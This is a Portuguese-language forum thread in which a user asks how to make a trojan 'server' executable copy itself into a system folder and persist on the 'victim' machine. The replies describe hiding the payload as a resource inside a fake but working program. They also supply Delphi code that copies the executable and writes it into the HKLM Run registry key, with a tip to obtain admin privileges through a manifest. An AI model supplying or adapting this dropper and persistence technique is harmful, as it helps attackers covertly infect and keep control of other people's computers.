Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Infectando Cliente Delphi

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Infectando Cliente Delphi

    A duvida que esta me tirando o sono é:
    Qual metodo posso usar para o meu EXEcutavel "SERVER'' criar um exe em outro lugar tipo ('c:\system32') Logo ao ser executado pela primeirao vez?


    Porque ai eu posso Iniciar ele pelo Registro.... Agora se ele nao gerar outro arquivo....a vitima ira executar "nao vai acontecer nada" a nivel de usuario ....

    e ela vai deletar pq o Exe nao presta....

    Logo o registro se tornando inutil pois o Exe nao vai estar mais na maquina


    ALGUEM PODE DAR UMA LUZ

    se alguem puder postar um exemplo Agradeço *-*

    Agradeço procurei nao consegui achar nada talvez por nao esta conseguindo "achar uma palavra chave para a pesquisa"

  • Font Size
    #2
    Vc pode inserir o executavel que deseja infectar a aquina como um "recurso" arquivos .rc
    Então cria todo um programa "fake" com as funçoes perfeitamente funcionais, ao abri-lo o trojan ira abri o "resource" em formato de stream e sava-lo no lugar que vc especificar... entao em resumo vc tera 2 programs dentro de 1 so... o Main apllication e um "compactado" dentro dele.

    Comment


    • Font Size
      #3
      Teria outa forma simples tb atraves dos comandos:

      copyfile(pwidechar(application.ExeName),pwidechar( local e nome da copia),false);

      em seguida o codigo para executar a segunda aplicação junto ao windows.

      app_auto_run(local e nome da copia,true);

      onde app_auto_run é uma procedure que irar editar a chave run no registro do windows algo do tipo:

      procedure app_auto_run(nome_dado_registro:string;autorun:boo lean);
      // executar aplicação junto ao windows
      // autorun = true sim
      // autorun = false não
      var
      Reg: TRegistry;
      begin
      Reg := TRegistry.Create;
      Reg.rootkey:=HKEY_LOCAL_MACHINE;
      Reg.Openkey('SOFTWARE\MICROSOFT\WINDOWS\CURRENTVER SION\RUN',false);
      case autorun of
      true:Reg.WriteString(nome_dado_registro,Applicatio n.ExeName);
      false:Reg.DeleteValue(nome_dado_registro);
      end;
      Reg.closekey;
      Reg.Free;
      end;

      lembrando de usar a unit Registry em uses claro e que a vitima não possua win 7 neste caso
      terar que fazer um manifest para que sua aplicação ganhe privilegio adiministrativo e consiga
      realizar a copia da aplicação no disco e tb a edição no registro do windows.

      Comment

      X
      Working...
      X